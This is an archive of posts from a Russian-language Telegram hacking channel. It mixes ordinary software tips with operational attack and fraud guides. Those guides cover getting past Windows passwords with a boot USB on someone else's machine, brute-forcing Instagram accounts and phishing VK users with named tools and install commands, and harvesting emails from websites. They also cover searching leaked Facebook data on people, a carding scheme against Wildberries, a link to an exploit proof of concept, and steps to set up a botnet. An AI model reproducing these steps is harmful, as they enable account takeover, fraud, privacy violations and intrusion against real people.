en
Feedback
Утечки 0-day

Утечки 0-day

Closed channel

🆘0-day l Zero Day 🪩Exploit l Code Database 🕸️Ethical Hacking l Penetration Testing ▪︎ Group: @darkodays ▪︎ Теневое приват сообщество: https://t.me/+W1xCuslFk3liMjli ▪︎ Chat: https://t.me/+ikofZIcwJ002ZjMy В ознокомительных целях.

Show more
289
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
Простейший способ обхода пароля в Windows Ситуации бывают разные: забытый пароль, срочно нужен доступ к чужому компьютеру, ищем компромат на обидчика. Речь о хакинге? Нет! Наш метод даже близко рядом с ним не стоит. Как минимум по уровню сложности исполнения. Ставим софт на флешку → вставляем USB-носитель в нужную машину → получаем доступ. 1. Вставляем флешку в свой комьютер. └ Дальнейшие действия сотрут все данные с USB-носителя. 2. Запускаем 𝗞𝗼𝗻𝗕𝗼𝗼𝘁 от имени администратора. Выйдет окно со списком возможностей программы. 3. Выбираем флешку в разделе «Available USB drivers». 4. Нажимаем «Install to USB stick (with EFI support)». Подготовка закончена — флешка готова к использованию. 5. Вставляем USB-носитель в целевой компьютер. 6. Во время загрузки системы заходим в BIOS. 7. Выставляем загрузку с флешки в приоритет. (см. скрин) Другой путь: при запуске системы постоянно нажимаем F8, дальше — стрелочками выбираем флешку и нажимаем Enter. 8. В окне загрузчика выбираем 1-ый пункт (см. скрин) #windows

​​Recuvaбесплатный софт от известного CCleaner для восстановления случайно удалённых файлов. Можно восстановить данные даже с поврежденных и отформатированных дисков, но шансы существенно ниже. Есть несколько важных действий, которые нужно предпринять после удаления файла и очистки корзины. ▪︎ Закройте все программы, записывающие данные на диск (например, BitTorrent); ▪︎ Не сохраняйте никакие данные на диск после удаления важного файла (не перезаписывайте); ▪︎ Не устанавливайте Recuva на тот же диск, откуда вы удалили ваш файл #софт #soft

Whoami — комплексный инструмент сохранения анонимности в Linux системах. ▪︎ Анти MiTM (человек-по-середине); ▪︎ Убийца логов;
Whoami — комплексный инструмент сохранения анонимности в Linux системах. ▪︎ Анти MiTM (человек-по-середине); ▪︎ Убийца логов; ▪︎ Меняет IP/DNS/MAC; ▪︎ Меняет часовый пояс и имя хоста. #софт #Linux #анонимность

Tinfoil Chat — еще один безопасный мессенджер для настоящих параноиков. Открытый исходный код. FOSS+FHD мессенджер, который и
Tinfoil Chat — еще один безопасный мессенджер для настоящих параноиков. Открытый исходный код. FOSS+FHD мессенджер, который использует аппаратную архитектуру высокой надежности для защиты пользователей от пассивного сбора данных, атак MITM и, что наиболее важно, удаленной фильтрации ключей. Все сообщения идут через Tor, в частности Tor сервисы нового поколения (V3). Разумеется, никакой регистрации не требуется. #мессенджер #darkoday #анонимность

Ghostpress — анти-кейлоггер, работающий в фоновом режиме. Удобная софтина для обнаружения и удаления кейлоггеров, хотя сложно
Ghostpress — анти-кейлоггер, работающий в фоновом режиме. Удобная софтина для обнаружения и удаления кейлоггеров, хотя сложно представить, что нужно делать современному пользователю, что бы рандомно поймать его в интернете, а не стать жертвой целенаправленной атаки. Есть платная и бесплатная версии. #софт #сниффер #security #darkoday #soft

Бесплатно получаем мощный хостинг на месяц от «Timeweb» (26.09.21) Перед вами способ получение достаточно хорошего хостинга для личных нужд. 1. Переходим по ссылке и регистрируемся; 2. Выбираем любой тариф и бесплатно получаем 10-ти дневный пробный период; 3. По истечению пробного периода вносим 1₽ на баланс; 4. В личном кабинете у нас появляется кнопка "Продлить Хостинги" и "Отложить платеж", выбираем "Отложить платеж" и получаем еще 1-2 недели для теста; 5. Абузим сервис с помощью мультиаккаунтов; 6. PROFIT! #hosting #хостинг

iSH — «карманный» Linux на iOS. Когда-нибудь хотели, чтобы у вас была командная строка Linux на iPad или iPhone? С iSH вы можете довольно близко подойти к этой цели. iSH Shell - это оболочка Linux для iOS, которая использует эмулятор x86 для запуска упрощенной версии Alpine Linux на iPad или iPhone. Установка: Простой способ установить iSH - через TestFlight, но вы также можете загрузить приложение сбоку *, если предпочитаете этот маршрут: 1️⃣ С iPad или iPhone установите TestFlight из App Store. 2️⃣ На iPad или iPhone нажмите следующую ссылку: https://testflight.apple.com/join/97i7KM8O  3️⃣ Выберите начало тестирования и примите условия TestFlight. 4️⃣ Нажмите «Установить» в TestFlight, это установит приложение iSH Shell в iOS. iSH установится на ваш iPhone или iPad, как и любое другое приложение, и вы можете открывать и закрывать его, как любое другое приложение для iOS. #ish #ios #linux #darkoday #лайфхак

Взламываем Wi-Fi через Termux Wifipumpkin3 — софт для проведения атак на Wi-Fi точки доступа. Может провозить атаки MiTM & Rogue, Имеет в себе сканер Wi-Fi сетей, сервис мониторинга DNS. Открытый исходный код. #wifi #attack #darkoday #soft

Получаем SMS-сообщения на компьютер Раньше мы отправляли SMS’ки девочкам с соседнего двора, а сегодня это чисто технический момент. Подтвердить регистрацию на сайте или перевод в платежной системе.. дальше дело обычно не заходит. Но даже при таком раскладе систему лучше наладить так, чтобы было максимально удобно! Да и кто знает, что может случиться: телефоны крадут, телефоны теряются. Всегда оставаться хозяином положения — вот слоган современных технологий! «Messages» от Google — приложение, которое синхронизирует СМС и ММС с веб-версией в браузере. Короче, можно читать и отправлять сообщения через Android, но на компе! Давай пошагово: открываем «Messages» → нажимаем на «...» в правом верхнем углу → выбираем «Подключить устройство» → переходим в веб-версию → нажимаем «Запомнить это устройство» → сканируем QR-код. Done! #лайфхак

Собираем электронные почты с вебсайтов. Email Grabber — утилита для сбора email с произвольного списка веб-сайтов. Установка: git clone https://github.com/KTN1990/Email-Grabber cd Email-Grabber Использование: python3 emailgrabberv2.py -h #grabber #email

Фишинг «Вконтакте» в Termux Robophish — лучшая утилита для фишинга Вк. Установка: git clone https://github.com/gasayminajj/ro
Фишинг «Вконтакте» в Termux Robophish — лучшая утилита для фишинга Вк. Установка: git clone https://github.com/gasayminajj/robophish cd robophish Переходим в HTML редатор и добавляем туда скрипт редиректа на наш сайт. <head> <meta http-equiv="refresh" content="1;URL=darknets.ru" /> </head> Запуск: bash robophish.sh #фишинг #vk

[Михаил Русаков] Написание лайфхаков на Python (2021) Вы получаете, скачая курс «Написание лайфхаков на Python»: ▪︎ 20 отличн
[Михаил Русаков] Написание лайфхаков на Python (2021) Вы получаете, скачая курс «Написание лайфхаков на Python»: ▪︎ 20 отличных примеров из самых разных областей; ▪︎Подробный видеоразбор, написание и тестирование каждого примера; ▪︎ Навык, который позволит Вам сэкономить на протяжении жизни тысячи и тысячи часов, которые Вы сможете потратить на себя; ▪︎ Знания, которая позволят Вам избежать выполнения рутинных, скучных задач, поручив их компьютеру, который сделает всё за Вас в миллионы раз быстрее и при этом безошибочно; ▪︎ Дополнительный опыт в программировании, который поможет при трудоустройстве Python-разработчиком; ▪︎Бонус, который научит Вас находить любые ошибки в своём (и даже чужом, например, скопированном из Интернета) коде; ▪︎ Все исходники из курса. ⚙ Download #курс #python #лайфхак

Cybersecurity. Ambient Technologies, IoT, and Industry 4.0 Implications. Дата выхода: Август 2021 года. Цена в онлайн магазине: 41$ / 3034₽. Table of Contents: 1.General and Specific Security Services, Risks and its Modeling 2.Vulnerability and Attack Detection Techniques: Intrusion Detection System 3.Digital Right Management in Computing Environment 4.Tradeoffs and Vulnerabilities in IoT & Cloud Secure Computing 5.Location and Availability Protections in Smart Mobility 6.Digital Forensics Cryptography with Smart Intelligence 7.Transmission Modelling on Malware Attack through Internet of Things 8.Rice plant disease detection using IoT 9.Secure Protocols for Biomedical Smart Devices 10.Access Control Mechanism in Healthcare Information System 11.Privacy Preservation tools and Techniques in Artificial Intelligence 12.Web Security Vulnerabilities: Identification, Exploitation and Mitigation 💰 Продажник #security #darkoday #книга

Ломаем инсту со смартфона Сегодня мы будем взламывать инстаграм посредством использования Termux. Инструмент который мы будем использовать основан на переборе паролей и называется IGHACK. Приступим: ▪︎ Первым делом обновляем все пакеты и устанавливаем наш инструмент: apt update apt upgrade install python -y install python2 -y install git -y git clone https://github.com/noob-hackers/ighack cd ighack bash setup ▪︎ Для запуска используем следующую команду: bash ighack.sh ▪︎ У нас откроется менюшка, где на выбор нам представят несколько функций: auto attack - автоматическая брутфорс атака, с паролями по умолчанию manual attack - брутфорс атака вручную, с вашим листом паролей about - описание утилиты update - обновление (рекомендую выбрать перед запуском) exit - выход из инструмента #brute #attack #darkoday #bruteforce #instagram

Открываем приложение на Android, не устанавливая его! Для тех, кто не хочет терять ни секунды: с помощью режима "Мгновенный запуск" вы можете открыть приложение из PlayMarket без установки! Инструкция: 1. Заходим в "Настройки" смартфона, листаем до раздела "Google" и открываем его. 2. Выбираем подраздел "Настройки для приложений Google". 3. Переходим в пункт "Google Play Instant" или "С мгновенным запуском" и нажимаем на переключатель напротив "Обновить веб-ссылки". 4. Открываем Play Market и находим приложение с поддержкой быстрого запуска, например, Vimeo. При переходе на страницу приложения видим кнопку "Попробовать" — нажимаем на неё, готово. Предупреждаем: не все приложения поддерживают технологию "Instant App", поэтому некоторые приложения всё-таки придётся скачивать. #лайфхак #android #darkoday

Пробив по Facebook В данном посте мы узнаем как можно пробить человека в БД facebook на onion сайте. FuckFacebook — ресурс дл
Пробив по Facebook В данном посте мы узнаем как можно пробить человека в БД facebook на onion сайте. FuckFacebook — ресурс для поиска в утечках Facebook почти всех стран, 435 млн строк. Находит: Facebook ID, номер телефона, имя и фамилию, работу, страну, статус и адрес. #osint #пробив #darkoday #facebook

​Вбив «Wildberries» (22.09.21) Название схемы говорит само за себя. 1. Скачиваем приложение «Wildberries» v. 4.0.6000 (4pda); 2. Греем/покупаем аккаунт с заказами (важно что бы заказы были сделаны с android'а) 3. Отключаем интернет, открываем приложение и выбираем свою страну 4. Далее появится окно "проверьте подключение к интернету", после чего включаем интернет и нажимаем "обновить"; 5. Набираем корзину и вбиваем, далее наступает развилочка; └ Если на карте есть деньги, то оплата пройдёт и она привяжется к аккаунту; └ Если карта невалидная или пустая, то вылезет белый экран с надписью "state 0"; └ Если вылез 3ds, то меняем аккаунт; 6. PROFIT! Тема строго в ознакомительных целях, не испытывайте судьбу #вбив #схема

1Password — наведи уже порядок с паролями! Хранить пароли в блокноте, ворде, мессенджере — дурная идея. Хуже только использов
1Passwordнаведи уже порядок с паролями! Хранить пароли в блокноте, ворде, мессенджере — дурная идея. Хуже только использовать везде один и тот же. Поэтому лучшая инвестиция в вашу спокойную цифровую жизнь — разобраться с паролями. Надо только один раз запариться, дальше все будет работать как надо. 1Password — он один из лучших на рынке, еще есть KeePass, Dashlane, Keeper и ряд других. Заметьте: все они платные. Я не верю в бесплатный менеджер паролей. Если вы пользуетесь чем-то бесплатно — значит продукт это вы и ваши данные. Поэтому только платные. Что умеет 1Password: • доступны все основные ОС и браузеры; • неограниченное количество паролей и 1ГБ для документов; • защита с двухфакторкой и сквозным шифрованием; • функция Travel Mode автоматически удаляет конфиденциальную информацию, которую потом легко восстановить. Приложение на iOS и Android, десктоп на Windows, macOS и Linux, расширение для Chrome. #безопасность

Очень опасная CVE-2021-40444. Патча нет. MHTML ActiveX под Win10. PoC https://raw.githubusercontent.com/Udyz/CVE-2021-40444-Sample/main/poc.html

BOTNET Для Linux [Debian/Kali/Windows/Termux] Установка: ▪︎Открываем терминал, и устанавливаем Python и также Git: apt install python3 git ▪︎Переходим в директерию с юзерботом: cd bnt ▪︎Устанавливаем зависимости: pip3 install -r requirements.txt ▪︎И запускаем файл через Python: python3 bot.py ▪︎Запускаем терминал и пишем такие комманды: cd bnt && python3 bot.py #botnet #darkoday